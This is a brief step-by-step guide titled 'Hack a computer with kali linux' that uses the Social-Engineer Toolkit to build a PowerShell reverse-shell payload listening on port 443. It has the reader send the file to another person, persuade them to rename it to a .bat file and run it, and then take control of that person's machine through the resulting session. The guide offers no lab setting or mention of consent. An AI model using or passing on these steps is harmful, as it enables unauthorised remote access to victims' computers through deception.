Hack a computer with kali linux. Detailed steps bellow: Kali Terminal Ifconfig (document IP address) Setoolkit Run 1, 9, 1 Type IP address of local kali machine Type 443 Before you type yes, copy the export path. Example: /root/.set/reports/powershell/ Type yes Open new terminal. Type cd and then the export path. Example: cd /root/.set/reports/powershell/ Type ls Copy the file. Example: x86_Powershell_Injection.txt Type cp and then the copied file and the ~/Desktop/ Example: cp x86_Powershell_Injection.txt ~/Desktop/ Go to Kali desktop and send that file to someone and have them turn it into a .bat file instead of a .txt file. Go back to first terminal and type sessions -i 1 Type help to get a list of commands to run on the host.